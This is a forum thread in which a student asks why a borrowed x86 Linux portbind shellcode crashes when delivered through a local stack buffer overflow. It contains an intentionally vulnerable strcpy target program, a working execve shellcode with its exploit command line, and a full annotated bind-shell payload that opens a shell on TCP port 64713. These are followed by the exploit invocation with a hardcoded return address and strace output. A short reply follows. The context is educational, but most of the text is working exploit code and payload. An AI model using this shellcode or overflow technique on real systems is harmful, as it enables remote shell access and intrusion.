
Thread: Problems with shellcode

    Question Problems with shellcode

    Hi there,
    I'm new to this forum and I hope I can get some help here (and of course I hope I can help other people :-) ). Let's get to the topic:

    I'm playing around with buffer overflows because of a project at university.
    What I am trying to do is to exploit a really stupid self-written server remotely.

    The problem is the shellcode, which I did not write myself (shame on me) but found on milw0rm. To avoid complications because of the network, I'm trying local buffer overflows first:

    [code]
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>

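    /*
     * Exercise target: copy the argument into a fixed 128-byte stack buffer.
     *
     * The strcpy() is intentionally unbounded -- it is the defect this
     * overflow exercise is built around: any argument of 128 bytes or more
     * runs past `buffer`, because strcpy() also copies the terminating NUL.
     *
     * @param args  NUL-terminated string to copy; must not be NULL
     *              (strcpy()/strlen() on NULL is undefined behaviour).
     */
    void A(const char *args) {
        char buffer[128];
        /* %p with a void * is the only well-defined way to print a pointer
         * (%x expects an unsigned int, not a char *). */
        printf("Adresse von buffer: %p\n\n", (void *)buffer);
        memset(buffer, 'B', sizeof buffer);
        strcpy(buffer, args); /* unbounded on purpose -- see header comment */
        /* %zu matches size_t (sizeof and strlen); %s wants the char array
         * itself, not its address-of (which has type char (*)[128]). */
        printf("\nbuff: [%s] (%p)(%zu/%zu)\n\n", buffer, (void *)buffer,
               sizeof buffer, strlen(buffer));
    }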

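    /*
     * Entry point: forwards the first command-line argument to A().
     *
     * @return 0 on success, 1 when no argument was supplied -- without the
     *         check A() would call strcpy() on a NULL pointer.
     */
    int main(int argc, char *argv[]) {
        if (argc < 2) {
            fputs("usage: one string argument required\n", stderr);
            return 1;
        }
        A(argv[1]);
        return 0;
    }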
    [/code]

    That one works fine with a stupid execve shellcode like this (that was for a smaller buffer...):
    [code]
    ./target `perl -e '{ print "\x90\x90\x90\x90\xeb\x14\x5b\x31\xc0\x99\x88\x43\ x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\xb0\x0b\xc d\x80\xe8\xe7\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\ x68"; print "AAAAAA"; print "\x40\xf8\xff\xbf"; }'`
    [/code]

    Now I'm trying this shellcode:
    [code]
    /*
    * linux-x86-portbind.c - portbind shellcode 86 bytes for Linux/x86
    * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
    *
    * portbind shellcode that bind()'s a shell on port 64713/tcp
    *
    */

    /* Raw payload bytes; every string fragment carries its disassembly.
     * The `jns dup_loop` below branches back to the instruction marked
     * `dup_loop:`. */
    char shellcode[] =

    /* socket(AF_INET, SOCK_STREAM, 0) */

    "\x6a\x66" // push $0x66
    "\x58" // pop %eax
    "\x6a\x01" // push $0x1
    "\x5b" // pop %ebx
    "\x99" // cltd
    "\x52" // push %edx
    "\x53" // push %ebx
    "\x6a\x02" // push $0x2
    "\x89\xe1" // mov %esp,%ecx
    "\xcd\x80" // int $0x80

    /* bind(s, server, sizeof(server)) */

    "\x52" // push %edx
    "\x66\x68\xfc\xc9" // pushw $0xc9fc // PORT = 64713
    "\x66\x6a\x02" // pushw $0x2
    "\x89\xe1" // mov %esp,%ecx
    "\x6a\x10" // push $0x10
    "\x51" // push %ecx
    "\x50" // push %eax
    "\x89\xe1" // mov %esp,%ecx
    "\x89\xc6" // mov %eax,%esi
    "\x43" // inc %ebx
    "\xb0\x66" // mov $0x66,%al
    "\xcd\x80" // int $0x80

    /* listen(s, anything) */

    "\xb0\x66" // mov $0x66,%al
    "\xd1\xe3" // shl %ebx
    "\xcd\x80" // int $0x80

    /* accept(s, 0, 0) */

    "\x52" // push %edx
    "\x56" // push %esi
    "\x89\xe1" // mov %esp,%ecx
    "\x43" // inc %ebx
    "\xb0\x66" // mov $0x66,%al
    "\xcd\x80" // int $0x80

    "\x93" // xchg %eax,%ebx

    /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */

    "\x6a\x02" // push $0x2
    "\x59" // pop %ecx

    "\xb0\x3f" // dup_loop: mov $0x3f,%al
    "\xcd\x80" // int $0x80
    "\x49" // dec %ecx
    "\x79\xf9" // jns dup_loop

    /* execve("/bin/sh", ["/bin/sh"], NULL) */

    "\x6a\x0b" // push $0xb
    "\x58" // pop %eax
    "\x52" // push %edx
    "\x68\x2f\x2f\x73\x68" // push $0x68732f2f
    "\x68\x2f\x62\x69\x6e" // push $0x6e69622f
    "\x89\xe3" // mov %esp, %ebx
    "\x52" // push %edx
    "\x53" // push %ebx
    "\x89\xe1" // mov %esp, %ecx
    "\xcd\x80"; // int $0x80

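    /*
     * Test harness: prints the payload length, then calls into the byte
     * array as if it were a function.
     *
     * Converting an object pointer to a function pointer is not portable C
     * (no conversion between the two is defined by the standard); it is
     * kept here because that is the whole point of the harness.
     *
     * @return 0 if control ever comes back from f(); the payload ends in
     *         execve(), so in practice it does not.
     */
    int main(void) {
        int (*f)(void) = (int (*)(void))shellcode;
        /* %zu: strlen() returns size_t, %u would be undefined behaviour */
        printf("Length: %zu\n", strlen(shellcode));
        f();
        return 0;
    }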

    // milw0rm.com [2006-04-06]
    [/code]
    If I execute that program, the shell on port 64731 works fine. But if I use that shellcode on my target, it crashes before execve():
    Code:
    pentest@****up:~$ ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
    Adresse von buffer: bffff418
    
    
    buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
                                                                  XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
    
    ^C
    pentest@****up:~$ strace ./testoverflow `perl -e 'print "\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x66\x68\xfc\xc9\x66\x6a\x02\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\x43\xb0\x66\xcd\x80\xb0\x66\xd1\xe3\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x6a\x0b\x58\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"; print "A"x46; print "\x18\xf4\xff\xbf";'`
    execve("./testoverflow", ["./testoverflow", "jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j\20QP\211\341\211"...], [/* 37 vars */]) = 0
    brk(0)                                  = 0x804b000
    access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
    mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fdf000
    access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
    open("/etc/ld.so.cache", O_RDONLY)      = 3
    fstat64(3, {st_mode=S_IFREG|0644, st_size=74923, ...}) = 0
    mmap2(NULL, 74923, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7fcc000
    close(3)                                = 0
    access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
    open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 3
    read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320h\1\0004\0\0\0\344"..., 512) = 512
    fstat64(3, {st_mode=S_IFREG|0755, st_size=1442180, ...}) = 0
    mmap2(NULL, 1451632, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb7e69000
    mprotect(0xb7fc5000, 4096, PROT_NONE)   = 0
    mmap2(0xb7fc6000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x15c) = 0xb7fc6000
    mmap2(0xb7fc9000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7fc9000
    close(3)                                = 0
    mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7e68000
    set_thread_area({entry_number:-1 -> 6, base_addr:0xb7e686c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
    open("/dev/urandom", O_RDONLY)          = 3
    read(3, "FN."..., 3)                    = 3
    close(3)                                = 0
    mprotect(0xb7fc6000, 8192, PROT_READ)   = 0
    mprotect(0x8049000, 4096, PROT_READ)    = 0
    mprotect(0xb7ffe000, 4096, PROT_READ)   = 0
    munmap(0xb7fcc000, 74923)               = 0
    fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
    mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fde000
    write(1, "Adresse von buffer: bffff418\n\n"..., 30Adresse von buffer: bffff418
    
    ) = 30
    write(1, "\n"..., 1
    )                    = 1
    write(1, "buff: [jfXj\1[\231RSj\2\211\341\315\200Rfh\374\311fj\2\211\341j"..., 168buff: [jfXj[�RSj��̀Rfh��fj��jQP����C�f̀�f��̀RV��C�f̀�jY�?̀Iy�j
                                                                    XRh//shh/bin��RS��̀AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA���] (0xbffff418)(128/136)
    
    ) = 168
    socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
    bind(3, {sa_family=AF_INET, sin_port=htons(64713), sin_addr=inet_addr("0.0.0.0")}, 16) = 0
    listen(3, 3221222540)                   = 0
    accept(3, 0, 0x3)                       = 4
    dup2(4, 2)                              = 2
    dup2(4, 1)                              = 1
    dup2(4, 0)                              = 0
    --- SIGSEGV (Segmentation fault) @ 0 (0) ---
    +++ killed by SIGSEGV +++
    Does anybody have an idea how I can solve this problem? I've tried multiple shellcodes now, but no shellcode more complex than the first one works (though they all do if I call them without an overflow - weird).

    Regards,

    Seppel

    My life is this forum thorin's Avatar

    Do the quoted ld.so.* files exist as shown in the error output?
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.
